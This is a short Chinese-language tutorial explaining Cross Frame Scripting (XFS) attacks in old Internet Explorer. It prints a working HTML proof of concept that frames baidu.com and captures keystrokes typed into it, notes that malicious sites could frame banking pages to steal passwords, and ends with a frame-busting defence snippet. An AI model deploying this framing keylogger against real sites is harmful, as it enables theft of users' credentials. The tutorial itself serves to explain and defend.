一、Cross Frame Script (跨框架腳本) 攻擊 什么是Cross Frame Script? 很簡單,做個實驗就知道了。把下面的這段HTML代碼另存為一個html文件,然后用ie瀏覽器打開。 <html> <head> <title>IE Cross Frame Scripting Restriction Bypass Example</title> <script> var keylog=''; document.onkeypress = function () { k = window.event.keyCode; window.status = keylog += String.fromCharCode(k) + '[' + k +']'; } </script> </head> <frameset onload="this.focus();" onblur="this.focus();" cols="100%"> <frame src="http://www.baidu.com/" scrolling="auto"> </frameset> </html> 當你在百度的搜索框輸入字符時,你會發現左下角的狀態欄上出現了你輸入的字符。 二、Cross Frame Script 原理 利用瀏覽器允許框架(frame)跨站包含其它頁面的漏洞,在主框架的代碼中加入scirpt,監視、盜取用戶輸入。 三、Cross Frame Script 危害 一個惡意的站點可以通過用框架包含真的網銀或在線支付網站,獲取用戶賬號和密碼。 解決方案 用戶:留心瀏覽器地址,不在帶框架頁面中輸入用戶信息 網站管理員: 在頁面中加入以下javascirpt代碼可以避免網站被XFS: if (top != self) { top.location=self.location; }